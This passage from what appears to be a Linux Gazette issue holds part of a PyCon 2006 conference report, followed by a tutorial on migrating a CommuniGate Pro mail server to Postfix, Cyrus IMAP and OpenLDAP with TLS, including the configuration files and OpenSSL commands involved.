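print status                               # -> odd

from collections import defaultdict
counts = defaultdict(int)                  # missing keys spring into existence as 0
for word in "spam spam eggs".split():
    counts[word] += 1
print dict(counts)                         # e.g. {'eggs': 1, 'spam': 2}

print any([0, "", 5])                      # True: at least one element is true
print all([1, "x", 5])                     # True: every element is true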
Guido resisted ctypes for a long time because it "provides new ways to make a Python program dump core" by exposing it to arbitrary C bugs. Skip Montanaro responded by listing several ways you can already make Python dump core (try these at home), and it was decided that ctypes wasn't any worse than those.
Now that Guido is employed at Google and can spend 50% of his paid time hacking Python, 3.0 doesn't have to wait until sometime after his 5-year-old son Orlijn graduates college. The planned changes for 3.0 are listed in PEP 3000. Guido highlighted the string/unicode issue: the str type will be Unicode, and a new bytes type will be for arbitrary byte arrays.
There's one late-breaking change, or rather a non-change: the unloved lambda will remain as-is forever. lambda creates anonymous functions from expressions. Attempts to abolish it were undone by use cases that required syntax that's arguably worse than lambda, and Ruby-style anonymous code blocks didn't fare any better. Programmers who overuse lambda should still be shot, however.
The other keynotes were on Plone and BitTorrent. I missed the Plone talk, but for BitTorrent Steve Holden interviewed Bram Cohen, BitTorrent's creator. Bram talked about hacking while slacking (he wrote most of his code while intentionally unemployed and living on savings), his new job as the owner of BitTorrent, Inc. (not much time to code), why he chose Python for BitTorrent, why BitTorrent doesn't make you into a carrier of malware (you won't be uploading anything you didn't specifically request to download), Pascal, and many other topics.
I made a wonderful faux pas the first evening at dinner when I sat next to Bram, unaware he was going to speak. I asked what he did, and he said he invented BitTorrent. I didn't remember what that was and kept thinking of Linux's former version control system, whose name I couldn't remember. Yet the term "torrent file" kept crossing my brain, clearly a configuration file and not related to the Linux kernel. Finally I remembered, "BitTorrent is that distributed file download thing, right?" Bram said yes. So I asked the guys across the table, "What was the name of Linux's former version control system?" They said, "BitKeeper". Ah ha, no wonder I got them confused. I thought no more about it, then Bram ended up mentioning BitKeeper several times during his keynote, usually in terms of how bad it is. He talked about BitKeeper vs. git (Linux's new version control system), git vs. other things, and then about BitTorrent vs. Avalanche. Avalanche is a distributed file download system from Microsoft, which Bram called vaporware in his blog, stirring up a lot of controversy (including a newspaper article in Australia).
For those who think BitTorrent is all about illegally downloading copyrighted songs and movies, Bram points to SXSW, a music and film festival which will be using BitTorrent to distribute its performances. "The Problem with Publishing: More customers require more bandwidth. The BitTorrent Solution: Users cooperate in the distribution." Other articles point out that a BitTorrent client normally interacts with 30-50 peers, reducing the strain on the original server by thirtyfold.
Bram also warned people to download BitTorrent directly from www.bittorrent.com and not from some random Google search. Shady operators are selling scams that claim to be BitTorrent but contain spyware or viruses. The real BitTorrent is free to download, and is Open Source under a Jabber-like license. The company does accept voluntary donations, however, if you really want to give them money.
The rest of PyCon was session talks, tutorials, lightning talks, Open Space, sprints, and informal "hallway discussions". The most interesting talks I saw or wanted to see were on the Python web frameworks. (If none of the existing ones suits you, you can write your own web framework based on BaseHTTPServer.HTTPServer in the standard library; it's easy!) So it's not surprising that PyCon had three talks on TurboGears, two on Django, three on Zope (plus several BoFs), and a couple on new small frameworks. All the discussion last year about framework integration has made them more interoperable, but it has not cut the number of frameworks. If anything, they've multiplied as people write experimental frameworks to test design ideas. Supposedly there's a battle between TurboGears and Django for overall dominance, but the developers aren't competing, they just have different interests. Jacob Kaplan-Moss (Django developer) and I (TurboGears developer) ran the Lightning Talks together, and we both left the room alive. Some people work on multiple frameworks, hoping the holy grail will eventually emerge. Much of the work focuses on WSGI and Paste, which help tie diverse components using different frameworks together into a single application. Some work focuses on AJAX, which is what makes Gmail and Google Maps so responsive and is slowly spreading to other sites.

Lightning talks are like movie shorts. If you don't like one, it's over in five minutes. They are done one after the other in hour-long sessions. Some people give lightning talks to introduce a brand-new project, others to focus on a specialized topic, and others to make the audience laugh. This year there were seventeen speakers for ten slots, so we added a second hour the next day. But in the same way that adding a new freeway lane encourages people to drive more, the number of excess speakers grew rather than shrank. We ended up with thirty speakers for twenty slots, and there would have been more if I hadn't closed the waiting list. The audience doesn't get bored and keeps coming back, so next year we'll try adding a third hour and see if we can find the saturation point. Some of the highlights were:
[ I don't understand what you mean by "didn't succeed", Mike - seems to me that wildly inappropriate responses to a question is perfectly normal IRC behavior... so how could anyone tell? -- Ben ]
There were other good talks too but since I was coordinating I couldn't devote as much attention to them as I would have liked.
I attended the TurboGears sprint and worked on Docudo, a wiki-like beast for software documentation, which groups pages according to software version and arbitrary category and distinguishes between officially-blessed pages and user-contributed unofficial pages. We wrote up a spec and started an implementation based on the 20-Minute Wiki Tutorial. This version will store pages in Subversion as XHTML documents, with Subversion properties for the category and status, and use TinyMCE for editing. TinyMCE looks like a desktop editor complete with toolbars, but is implemented in Javascript. We've got parts of all these tasks done in a pre-alpha application that sort of works sometimes.
Other TurboGears fans worked on speeding up Kid templates, adding unittests, improving compatibility with WSGI middleware and Paste, using our configuration system to configure middleware, and replacing CherryPy with RhubarbTart and SQLObject with SQLAlchemy. Don't get a heart attack about the last two: they are just experimental now, won't be done till after TurboGears 1.0, and will require a smooth migration path for existing applications. We had a variety of skill levels in our sprint, and some with lesser skills mainly watched to learn some programming techniques.
There were ten people in the TurboGears sprint and fifty sprinters total. Other sprinters worked on Zope, Django, Docutils, the Python core, and a few other projects.
The sprint was valuable to me, even though I'm not fully committed to TurboGears, because I'm starting to write TurboGears applications at work: it was good to write an application with developers who know more than I do about it. That way they can say, "Don't do that, that's stupid, that's not the TG way." I would have liked to work on the RhubarbTart integration but I had to go with what's more practical for me in the short term. So sprinting is a two-way activity: it benefits the project, and it also benefits you. And it plants the seeds for future contributions you might make throughout the year.
Dallas was not the transportation wasteland I feared (ahem Oklahoma City, Raleigh, Charlotte...) but it did take 2-3 hours to get to PyCon without a car, and that includes taking a U-shaped path around most of Dallas. An airport shuttle van goes from the sprawling DFW campus to the south parking lot a mile away. From there another airport shuttle goes to the American Airlines headquarters, an apartment building (!), and finally the Dallas - Fort Worth commuter train. That's three miles or thirty minutes just to get out of the airport. The train goes hourly till 10:30pm, but not on Sundays. It cost $4.50 for an all-day rail/bus pass. The train pokes along at a leisurely pace, past flat green fields and worn-down industrial complexes, with a few housing developments scattered incongruously among the warehouses. Freight trains carried cylindrical cars labelled "Corn Syrup" and "Corn Sweetener". Good thing I wasn't near the cars with a hatchet; I feel about corn syrup the way some people feel about abortion. The train stopped in downtown Dallas at an open section of track euphemistically called "Union Station". I transferred to the light rail (blue line) going north. This train was speedy, going 55 mph underground and 40 mph above, with stops a mile apart. Not the slowpoke things you find in San Jose and Portland; this train means business. The companies along the way seem to be mostly chain stores. At Arapaho Station (pronounced like a rapper singing, "Ah RAP a ho!") in the suburb of Richardson, I transferred to bus 400, which goes twice an hour. A kind soul on the train helped me decide which bus to catch. The bus travels west half an hour along Belt Line Road, a six-lane expressway. It crosses other six-lane expressways every twenty blocks. Dallas has quite the automobile capacity. We're going through a black neighborhood now. The driver thinks the Marriott is a mile away and I should have gotten another bus, but the hotel map says it's at Belt Line Road and the North Dallas Tollway. When we approach the intersection with the birds, all is explained. The road the hotel is named after goes behind the hotel and curves, meeting the tollway. So the map was right.
[ A note from my own experience in Dallas, where I teach classes in the area described above: a shuttle from DFW is ~$20 for door-to-door service, and takes less than a half an hour. -- Ben ]
Around the hotel is mostly expense-account restaurants for the executive crowd. We didn't find a grocery store anywhere. So I learned to eat big at meals because there wouldn't be any food until the next one. There was a mall nearby and a drugstore, for all your non-food shopping.
The weather was... just like home (Seattle). Drizzle one day, heavy rain the next, clear the day after. Same sky but ten degrees warmer. Then the temperature almost doubled to 80 degrees (24C) for three days. In February! I would have been shocked but I've encountered that phenomenon in California a few times.
Saturday evening a local Pythoneer took two of us to downtown Dallas. Downtown has several blocks of old brick buildings converted to loft apartments and bars and art galleries, and a couple coffeehouses and a thrift shop. Another feature is the parking lot wavers. I swear, every parking lot had a person waving at the entrance trying to entice drivers. It's 10pm, you'd think the lot attendants would have gone home. Especially since there were plenty of metered spaces on the street for cheaper. There weren't many cars around: there were almost as many parking lots as cars! It was a bit like the Twilight Zone: all these venues and not many people. We went to Café Brazil, which is as Brazilian as the movie. In other words, not at all.
PyCon will be in Dallas next year around February-April, so come watch the birds. The following year it might be anywhere in the US.
[1] Guido van Rossum, Python's founder.
[2] The name "Cheese Shop" comes from a Monty Python skit. The Cheese Shop was formerly called the Python Package Index (PyPI), but was renamed because PyPI was confused with PyPy, a Python interpreter written in Python. They are both pronounced "pie-pie", and the attempt last year to get people to call PyPI "pippy" failed. Some people don't like the term "Cheese Shop" because it doesn't sell any cheese. But the shop in the skit didn't either.
Talkback: Discuss this article with The Answer Gang
Mike is a Contributing Editor at Linux Gazette. He has been a
Linux enthusiast since 1991, a Debian user since 1995, and now Gentoo.
His favorite tool for programming is Python. Non-computer interests include
martial arts, wrestling, ska and oi! and ambient music, and the international
language Esperanto. He's been known to listen to Dvorak, Schubert,
Mendelssohn, and Khachaturian too.
By René Pfeiffer and pooz
Once upon a time, not so very long ago, a proprietary mail service decided to stop working by completely suspending all activities every 15 minutes. We quickly used a workaround to restart the service regularly. After that, the head of the IT department approached Ivan and me and asked for a solution. We proposed replacing the mail system with a combination of Postfix, Cyrus IMAP, and OpenLDAP, along with a healthy dose of TLS encryption. This article sheds some light on how you can tackle a migration like this. I am well aware that there is plenty of information about every subsystem, but we built a test system and tried a lot of configurations because we couldn't find a single source of information that dealt with connecting all these parts.
First I have some words of caution.
Moving thousands of user accounts with their mailboxes from one mail platform to another shouldn't be done lightly. We used a test server that ran for almost two months and tried to look at most of the aspects of our new configuration. Here is a rundown of important things that should be done in advance.
You need to have a rough idea of what you want to achieve before you start hacking config files. Our idea was to replace the mail system running on CommuniGate Pro with a free software equivalent. Since our infrastructure is spread among multiple servers, we only had to worry about the mail server itself: how to recreate the configuration, how to move the users' data, and how to reconnect it with our external mail delivery and web mail system. We have external POP3/IMAP users that access their mail directly, and the web mail system uses IMAP. The relation of every server and service is shown in this little picture.
Putting everything together: we wanted a Cyrus server to handle the mailboxes, a Postfix server to deal with incoming and outgoing email, and an OpenLDAP server to hold as many settings as possible. The LDAP tree gets a lot of requests (we get 80000+ mail requests per day), so we decided that every server involved with user email should have a local copy in the shape of two OpenLDAP slave servers. The green lines in the diagram are read operations. The red lines are write operations. The blue lines denote SMTP transactions. Mail enters our system at the firewall, and every mail for outside domains is handled by the firewall, too. We will now take a look at how the services in the white boxes have to be configured in order to work in tune.
All of the software packages involved in the mail system are capable of encryption via Transport Layer Security (TLS). We wanted to use TLS with SMTP, to have our OpenLDAP servers do all synchronisation via LDAPS/LDAP+TLS, and to offer IMAPS and POP3S.
TLS can be implemented by using OpenSSL and putting the necessary keys and certificates into the right places. You need the following files: the certificate of a certification authority (CA), a private key for every server, and a certificate for each of those keys, signed by the CA. Since we act as our own CA, the first step is to set it up:
mkdir myCA
chmod 0700 myCA
cd myCA
mkdir {crl,newcerts,private}
touch index.txt
echo "01" > serial
cp /usr/share/examples/openssl/openssl.cnf .
Use the sample openssl.cnf file and edit the values in the section ca or CA_default. The paths need to point to the directories we have just created. You also need to edit the information about your CA in the root_ca_distinguished_name section. A sample openssl.cnf is attached to this article.
When you have taken care of your CA's configuration you can create its private key and certificate.
openssl req -nodes -config openssl.cnf -days 1825 -x509 -newkey rsa -out ca-cert.pem -outform PEM

After that, all you have to do is create a key and a certificate request for every server you wish to involve in encrypted transmissions.
openssl genrsa -rand /dev/random -out yourhost.example.net.key
openssl req -new -nodes -key yourhost.example.net.key -out yourhost.example.net.csr

I use /dev/random as the entropy source. If your system lacks sufficient I/O (i.e., keyboard strokes or mouse movements) or has no hardware random generator, you might consider using /dev/urandom instead. Signing this key with your own CA in this directory is done by using:
openssl ca -config openssl.cnf -in yourhost.example.net.csr -out yourhost.example.net.cert
In order to use encryption and to allow certificate verification, you will have to copy your CA's certificate ca-cert.pem, your host's key yourhost.example.net.key, and the key certificate yourhost.example.net.cert to your system configuration. We will soon see how we use these parts together with Postfix and OpenLDAP.
The idea is to use a central OpenLDAP server to store all user settings and some of the Postfix lookup maps. We use the LDAP tree of our organisation dc=example,dc=net and create a subtree for all our accounts. Then we create another subtree for the Postfix settings. You can think of the subtrees being containers for data, mainly accounts.
The gidNumber, homeDirectory, and uidNumber attributes are only necessary if services other than POP3/IMAP get their information from the LDAP tree; Cyrus and Postfix don't need them. The same is true for the sambaSID. Since we were reorganising our user account data anyway, we did it properly in case other applications want to use the LDAP tree as well. Additional attributes, such as mailAlternateAddress for alias addresses, come in handy for mail processing; we will meet that one again when importing the alias list below.
Two other new classes are the lookupName and lookupTableEntry for the Postfix lookup tables. Postfix supports arbitrary lookup schemes. lookupName is a container for single lookupTableEntry entries that match a lookupKey to a lookupValue. This allows for a very simple mapping of anything to anything.
lookupKey=rene.pfeiffer@example.net ---> lookupValue=lynx lookupKey=ivan.averintsev@example.net ---> lookupValue=ivan lookupKey=disable@example.net ---> lookupValue=devnull
For your convenience this schema definition is also in a separate file. Use it as you like.
First of all it is necessary to extract all the account information, including user names, passwords, quota settings, aliases, and the like. The CommuniGate server offers an LDAP export. Querying all user data can be done with a Perl script named cgate_migrate_ldap.pl. The script extracts the attributes cn, sn, uid, mail and userPassword. The result is written to our new LDAP server. If the user already exists on the target server, the user information is compared and updated, provided there is a difference. You can take a look at the script's options by using perldoc cgate_migrate_ldap.pl.
Unfortunately this export does not cover all necessary information, so we had to write a second Perl script that collects additional information from the server's account.settings files. These files look like the following, and usually live inside the user's directory /var/CommuniGate/Accounts/user.name.macnt/.
{
  DefaultMailboxType = MailDirMailbox;
  ExternalINBOX = NO;
  MaxAccountSize = 100M;
  MaxWebSize = 0;
  Password = XXXXXXXX;
  RealName = "Rene Pfeiffer";
  RPOPAllowed = NO;
  Rules = ((0,"#Vacation",(("Human Generated","---"),(From,"not in","#RepliedAddresses")),
    (("Reply with","Ich bin vom 6. bis 13. Oktober 2005 fuer Nachrichten\enicht erreichbar. Bitte alle dringenden Anfragen\ean help@example.net richten."),
    ("Remember 'From' in",RepliedAddresses))));
}

You can see the quota setting and the automated rules for vacation messages or mail forwardings. They aren't exported via LDAP and have to be obtained this way. First, we need all the account.settings files. You can collect them with the following commands (you must have read permissions):
cd /var/CommuniGate/Accounts/
find . -type f -name account.settings | xargs -i{} tar -r --numeric-owner -f ~/as.tar {}

You can then copy the archive as.tar to another place where fiddling with the files doesn't cause any harm. We moved it to our test server, extracted it, and built a list of paths to all files. We then used this list as input to our Perl script.
mkdir accounts
cd accounts
tar -xf ~/as.tar
find ~/accounts -type f -printf "%h/%f\n" > ~/as_list.txt

Now you can feed this list to cgate_account_settings.pl and update the user settings in the LDAP tree.
~/cgate_account_settings.pl --target ldapmaster.example.net ~/as_list.txt

Again, you can look up the options of the script by using perldoc. The migration script has some built-in defaults to reduce the length of the command line. The last thing missing is the user alias list. CommuniGate stores it as a single file, /var/CommuniGate/Accounts/Settings/aliases.data. Every user is listed with all aliases on a single line. The format looks like this:
rene.pfeiffer = (r.pfeiffer,rpfeiffer,lynx);

A third script, cgate_alias_settings.pl, took care of parsing this file and writing the aliases to the mailAlternateAddress attribute. It is invoked similarly to the other two.
~/cgate_alias_settings.pl --target ldapmaster.example.net aliases.data
That's all we wanted to extract. Important note: The scripts we used worked well enough for our case. We tried to get as much information as possible, but we didn't want to parse everything, so be careful and test these scripts before you use them on live data. They might miss something.
CommuniGate Pro has a built-in list server. It works fairly well, but it has the habit of rewriting the mail headers when forwarding mail to lists (and to users - that's one of the reasons why we decided to switch). So far we haven't seen any sign of the list configuration: it isn't exported via LDAP, and the user settings don't contain any list settings. Since we wanted to move the lists to our new list server and therefore to change their addresses anyway, we extracted all list members and created simple exploder lists with Postfix hash tables. CommuniGate stores all list information in the /var/CommuniGate/Accounts/LISTS/ folder. The files ending with .list contain all subscribers. A shell script can read all lists and create the maps for Postfix.
./create_list_maps.sh /var/CommuniGate/Accounts/LISTS/ ~/cgate_lists
We will use cgate_lists in our Postfix configuration later. Important note: This simple script ignores deactivated users on mailing lists. This is only a temporary solution until you can recreate the lists on a real list server and have the list owners check their subscribers.
Whenever you copy mailboxes from one server to another, you have to keep in mind how the clients see the mail data. We tried to make the move as smooth as possible, but two things got in our way. First of all, the Cyrus IMAP server treats the INBOX as the root and shows all other mail folders "below" the INBOX. The old mail system used a flat namespace.
Old server:  imap://imap.domain.xyz/Sent
Cyrus IMAP:  imap://imap.domain.xyz/INBOX/Sent
Most clients get the idea and display the folders accordingly. We had to hack our webmail to subscribe all the old folders under the new namespace, so as not to bother our web users. Clients such as mutt, Thunderbird or Sylpheed handle this change for you; however, you still need to rearrange the folder structure. Some clients need to recreate the account settings by adding a new account.
Another issue concerns the user names. By default Cyrus uses the netnews namespace convention. This means that a "." is used to separate hierarchical layers (as Usenet does). If you allow "." to appear in a user's login, then you need to configure Cyrus to use the UNIX hierarchy convention via the simple option unixhierarchysep=yes|no in its configuration. A "/" is then used as the separator. Don't be surprised to see something like "user.rene^pfeiffer" in the logs or mail store: this is how a mailbox is addressed by Cyrus IMAP, and the "." in the login is handled internally as a "^".
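The relevant line in imapd.conf simply reads:

unixhierarchysep: yes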
When we extracted the user settings, we copied them 1:1 into the LDAP tree and into the Cyrus user settings. We also did this for the quota. To our great surprise, this created a rather unpleasant situation. Apparently the CommuniGate and the Cyrus server compute the quotas differently. Mailboxes that were almost at the limit on the old system became over quota on Cyrus. So we had to add 5 MB to the quota of every user in order to accommodate the mail from the old mailbox. Make sure that you have a buffer for this, or your users will lose emails.
Ok, let's get our hands dirty and configure the servers.
Designing an LDAP hierarchy is a complex topic. You can spend months thinking about the best way to go. We won't do an elaborate design. We need to store our users' settings and the Postfix lookup tables, that's all. If you want to extend your LDAP tree beyond that, make sure that you get well acquainted with the concepts. We use OpenLDAP for all LDAP servers. Most Linux distributions have a pre-packaged version. You can also compile the server from source. Use whatever method you feel comfortable with - but make sure that you can handle the upgrades and the bug fixing. We compiled OpenLDAP from source and used the following options.
./configure --sysconfdir=/etc/ldap --localstatedir=/home/ldap/var \
  --with-cyrus-sasl --with-threads --with-tls --enable-slapd --enable-crypt \
  --enable-spasswd --enable-wrappers --enable-ldbm --enable-perl --enable-shell --enable-slurpd

Make sure that you have Berkeley DB, OpenSSL, Cyrus SASL, Perl, TCP wrappers, and GNU dbm, plus their development packages, installed. After compiling and installing, you should end up with the slapd server, the slurpd replication daemon, and the usual OpenLDAP client tools.
The OpenLDAP distribution includes a couple of schema definitions. These cover the basic LDAP object classes and their attributes. We extended the schemas by using additional schema files from Sendmail, Samba, Mozilla, and a modified schema file from qmail-ldap. You can simply add the schema files to your existing configuration. However, you have to take care that your schemas don't define any attributes twice. It's best to test that in advance. We will now build the configuration for the master and the two slave servers.
Basically an OpenLDAP server is a program that exports a directory filled with databases via the network. You have to configure the paths to the database store, where it finds the schema files, where it stores its process ID, and the permissions for the LDAP tree. I have provided a sample slapd.conf config file, and I will highlight the most important options. First we have the schema files.
include /etc/ldap/openldap/schema/core.schema
include /etc/ldap/openldap/schema/cosine.schema
include /etc/ldap/openldap/schema/nis.schema
include /etc/ldap/openldap/schema/misc.schema
include /etc/ldap/openldap/schema/inetorgperson.schema
include /etc/ldap/openldap/schema/sendmail.schema
include /etc/ldap/openldap/schema/samba.schema
include /etc/ldap/openldap/schema/mozillaOrgPerson_V0.6.schema
include /etc/ldap/openldap/schema/greenmta.schema
include /etc/ldap/openldap/schema/lookup.schema

The schema files are included in this order. You can see that we have chosen to put our server config into /etc/ldap/openldap/.
The next important part deals with encryption. I mentioned earlier that every server should have a key and a certificate. Copy these files to your config directory and tell OpenLDAP to read and to use them. You also have to include your CA's certificate if you want to check the signature.
TLSCACertificateFile /etc/ldap/openldap/cacert.pem
TLSCertificateFile /etc/ldap/openldap/master.example.net.cert
TLSCertificateKeyFile /etc/ldap/openldap/master.example.net.key
TLSRandFile /dev/random
We use /dev/random as the entropy source since our servers have hardware entropy generators. If your machine lacks good entropy sources, you should use /dev/urandom instead.
Now we define where our databases live and what the root of the LDAP tree will be. We also configure an OpenLDAP super user.
database        bdb
suffix          "dc=example,dc=net"
rootdn          "cn=ldaproot,dc=example,dc=net"
rootpw          {SSHA}Rwilfur49jrtPsw7dJJPp5RBoX2f+gHV
directory       /var/lib/ldap

We want to use the Berkeley databases (bdb). The root of our tree is called dc=example,dc=net. Our superuser account is called cn=ldaproot,dc=example,dc=net. The password is hardcoded into the config file; therefore, it is a good idea to encode it so that not everyone can see it immediately. The command slappasswd can be used to do this.
lynx@wombat:~$ /usr/local/sbin/slappasswd -s 6202f430d9c9a97da8d041946847643f
{SSHA}Rwilfur49jrtPsw7dJJPp5RBoX2f+gHV
lynx@wombat:~$
The password is 6202f430d9c9a97da8d041946847643f. The output of slappasswd can be pasted into the config file. The last option defines the directory where the databases are stored.
The OpenLDAP master server holds the master copy of the LDAP tree. Every change is copied immediately to all slave servers. This is called replication. It is a kind of instant backup, with the difference that the data is transferred to live servers. The master server needs to know where to copy the data to. This is configured with the replica directive.
replogfile /var/lib/ldap/replogfile
replica uri="ldaps://slave1.example.net" starttls=yes bindmethod=simple \
  binddn="cn=ldaproot,dc=example,dc=net" credentials="6202f430d9c9a97da8d041946847643f"
replica uri="ldaps://slave2.example.net" starttls=yes bindmethod=simple \
  binddn="cn=ldaproot,dc=example,dc=net" credentials="6202f430d9c9a97da8d041946847643f"
Every replica line describes the slave server along with the full login information. The account at the slave server needs full write permissions, or else the information on the slave servers can't be written. That's why we used the LDAP superuser. Another approach is to define a special replication user just for this purpose. The master server keeps a log of changes for every slave. In case a connection to a specific slave is lost, the changes get buffered and are sent to the slave as soon as it is reachable again.
The OpenLDAP slave servers have a similar configuration to the master server, but you have to keep some important things in mind.
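In particular, the slave has to accept updates from the master and refer all other write attempts back to it. A minimal sketch of the slave-side additions to slapd.conf, assuming the slurpd-style replication shown above, looks like this:

# Accept replicated changes from this DN (must match the binddn
# in the master's replica directive)
updatedn "cn=ldaproot,dc=example,dc=net"
# Refer write requests from ordinary clients to the master
updateref ldaps://master.example.net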
After that, your master server should log into the slave and send updates as soon as you modify the master LDAP tree. Master and slaves have a steady TCP connection that you can see by using netstat. Important note: Don't forget to create a new key and certificate for the slave or else the encryption won't work.
We used standard Debian Postfix packages. You have to install the packages postfix, postfix-ldap, postfix-pcre, and postfix-tls for the functionality we need. If you compile from source, make sure you have the PCRE, OpenLDAP, and OpenSSL development files installed.
The Postfix server can be linked to any LDAP V3 server. Since the OpenLDAP server works much like an electronic phonebook, it makes sense to have Postfix query it for anything it might have to look up when receiving email.
By retrieving this information from the LDAP tree, you can map almost everything to your local mailboxes. Our scenario has one main domain that goes into mydestination (plus the local names for the machine). All satellite domains with just a few aliases go into virtual_alias_domains, where the email address is mapped to real local mailboxes by our lookupTableEntry objects.
Well, this is all nice, but how is it written to the Postfix configuration? Let's start with mydestination. Usually you list the local domains as a simple string like this:
mydestination = agamemnon.example.net, localhost.localdomain, localhost

If you want Postfix to get this information from the OpenLDAP server, you just have to change this line to
mydestination = localhost, ldap:/etc/postfix/mydestination.cf

and create the file /etc/postfix/mydestination.cf. The string 'localhost' is hardcoded into the configuration, because localhost isn't likely to go anywhere else. After that, Postfix reads mydestination.cf. This file tells Postfix how to connect to the LDAP server, and where and how to search for the local domains. Since we connect to the OpenLDAP slave server on localhost, we don't need TLS: we'll be talking to the loopback device. We tell Postfix to look into the mydestination subtree and search for the attribute lookupKey.
server_host = 127.0.0.1
server_port = 389
search_base = lookupName=mydestination,cn=postfix,cn=mailstore,ou=server,ou=edv,dc=example,dc=net
scope = sub
timeout = 30
bind = yes
bind_dn = cn=postfix,ou=system,ou=accounts,dc=example,dc=net
bind_pw = XXXXXXXXXX
version = 3
start_tls = no
query_filter = (lookupKey=%s)
result_attribute = lookupValue

In the case of mydestination, the result attribute can contain anything. If Postfix finds a match, it knows that the domain is local. If it doesn't, then the mail is rejected. This technique can now be used for other lookup tables. Some directives will involve multiple lookups in different tables, but this is no problem for Postfix.
alias_maps = hash:/etc/aliases, hash:/etc/postfix/cgate_lists
virtual_alias_domains = ldap:/etc/postfix/virtual_alias_domains.cf
virtual_alias_maps = ldap:/etc/postfix/mailforwards.cf ldap:/etc/postfix/virtual_alias_maps.cf ldap:/etc/postfix/ldap-user-aliases.cf
local_recipient_maps = ldap:/etc/postfix/local_recipient_maps.cf $alias_maps $virtual_alias_maps
The alias_maps are the local lookup tables for the system aliases. We use no LDAP lookup there, because we're dealing with static names. We also put the migrated mailing lists there. They consist of simple exploder lists where the left side is the name of the list and the right side holds all subscribers. Bear in mind that this is a poor substitute for a full list server and a temporary solution at best.
The virtual_alias_domains is a table with virtual domains, just as the name implies. This is only "half" of a lookup table, since Postfix only needs to know whether a domain is present and counts as virtual. Postfix therefore only evaluates the result of the LDAP search - found or not found. Technically this means that you can put whatever you want into the lookup value when adding a virtual domain. You can take a look at virtual_alias_domains.cf to see that there is no difference from the lookup method we already discussed.
We then define the virtual_alias_maps as a chain of three LDAP lookups. The order is important.
The last lookup definition deals with anything that is recognised as local. That's the job of local_recipient_maps. We consider anything local that is either defined in alias_maps, virtual_alias_maps, or by the lookup configured in local_recipient_maps.cf. The LDAP table simply looks in the account branch for any valid user account.
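The file local_recipient_maps.cf follows the same pattern as mydestination.cf. A sketch, assuming the accounts subtree from above and a lookup on the uid attribute, could look like this:

server_host = 127.0.0.1
server_port = 389
search_base = ou=accounts,dc=example,dc=net
scope = sub
bind = yes
bind_dn = cn=postfix,ou=system,ou=accounts,dc=example,dc=net
bind_pw = XXXXXXXXXX
version = 3
query_filter = (uid=%u)
result_attribute = uid

Any of these maps can be tested from the command line with postmap, for example:

postmap -q rene.pfeiffer@example.net ldap:/etc/postfix/mailforwards.cf

If the query prints the expected lookup value, Postfix will see the same result at SMTP time.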
Any mail bound for local recipients must be stored into the mailboxes. Postfix doesn't handle mailboxes, but the Cyrus IMAP server does. Both servers support the Local Mail Transfer Protocol (LMTP). LMTP is a queueless mail transmission protocol used for local mail transport, as the name suggests. Postfix's configuration file needs the following directives.
mailbox_transport = lmtp:localhost
lmtp_sasl_auth_enable = yes
lmtp_sasl_password_maps = hash:/etc/postfix/lmtp_passwd
lmtp_sasl_security_options = noanonymous

mailbox_transport indicates where the LMTP receiver is located. You might need to add a definition for lmtp to your /etc/services. Important: LMTP must not use port 25! The other three lines tell Postfix that the LMTP transmission requires authentication. Cyrus has its own accounts for its subsystems, and we wanted to have an lmtpadmin. Thus the file lmtp_passwd contains:
localhost lmtpadmin:secretpassword
This tells Postfix to use the username lmtpadmin with the given password when speaking LMTP to localhost.
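LMTP has no well-known port of its own; /etc/services traditionally reserves port 24 for "any private mail system", so an entry along these lines will do (any free local port other than 25 works):

lmtp            24/tcp          # site-specific choice, see text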
TLS is the last setting we need. Postfix supports TLS encryption with many configuration options. The bare bones setup needs only a few. Here is the part for the SMTP server subsystem:
smtpd_tls_cert_file = /etc/ldap/openldap/mailstore.example.net.cert
smtpd_tls_key_file = /etc/ldap/openldap/mailstore.example.net.key
smtpd_tls_CAfile = /etc/ldap/openldap/ca-cert.pem
smtpd_use_tls = yes
smtpd_enforce_tls = no
smtpd_tls_ask_ccert = no
smtpd_tls_req_ccert = no
smtpd_tls_dh1024_param_file = /etc/postfix/dh_1024.pem
smtpd_tls_dh512_param_file = /etc/postfix/dh_512.pem

The first three lines tell Postfix where the key, the certificate, and the CA's certificate are stored. Then we switch TLS on. Make sure that you still accept connections without TLS (TLS-only mail servers do not strictly conform to the RFCs). smtpd_tls_ask_ccert and smtpd_tls_req_ccert say that we neither request nor require client certificates. smtpd_tls_dh1024_param_file and smtpd_tls_dh512_param_file point to files that contain the parameters for the Diffie-Hellman key agreement protocol. You can either copy them from existing configurations or create them yourself by using OpenSSL.
openssl gendh -out /etc/postfix/dh_1024.pem -2 -rand /dev/random 1024
openssl gendh -out /etc/postfix/dh_512.pem -2 -rand /dev/random 512
By executing the above commands, the parameters are generated. Important note: The above lines use /dev/random as the entropy source. Again, if your server has no good entropy sources, such as sufficient disk I/O or hardware entropy gatherers, then you should consider using /dev/urandom instead.
Postfix acts as an SMTP client when delivering outbound mail. This part has separate TLS config options.
smtp_use_tls = yes smtp_tls_note_starttls_offer = yes smtp_tls_CAfile = /etc/ldap/openldap/ca-cert.pem
They are similar to the server options above.
You can read the whole Postfix configuration main.cf and see all of the options together.
We used the Debian Cyrus IMAP package. It is quite painless to install, and you only need to take care of a few things. The configuration files you will be dealing with are /etc/saslauthd.conf, cyrus.conf, and imapd.conf.
Whenever a user wishes to fetch email via IMAP or POP3, the Cyrus server needs to verify the login information. One way to do this with our OpenLDAP servers is to use the SASL AUTH daemon and plaintext authentication. Plaintext isn't a problem, since we offer TLS for every connection: every client capable of TLS can encrypt the session with the Cyrus server. The LDAP parameters are defined in /etc/saslauthd.conf:
ldap_servers: ldap://127.0.0.1/
ldap_version: 3
ldap_timeout: 10
ldap_time_limit: 10
ldap_cache_ttl: 30
ldap_cache_mem: 32768
ldap_scope: sub
ldap_search_base: ou=accounts,dc=example,dc=net
ldap_auth_method: custom
ldap_bind_dn: cn=ldaproot,dc=example,dc=net
ldap_password: 6202f430d9c9a97da8d041946847643f
ldap_filter: uid=%U
The SASL AUTH daemon is told to connect to the local LDAP slave and to search for a match between the login name and the attribute uid. In order to check the password, the daemon has to bind as the LDAP superuser, because only the superuser has access to the userPassword attribute. If you are uncomfortable with this, you can define additional LDAP users that may check userPassword. The other parameters set limits and the search tree. Important note: This file mustn't be world-readable! It contains an important password, so guard this information well.
Now your SASL AUTH daemon knows where to look for login information. You still have to tell the Cyrus IMAP server that it should utilise the SASL AUTH daemon.
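Before wiring up Cyrus, you can test the daemon on its own. The testsaslauthd utility ships with Cyrus SASL:

testsaslauthd -u rene.pfeiffer -p secretpassword

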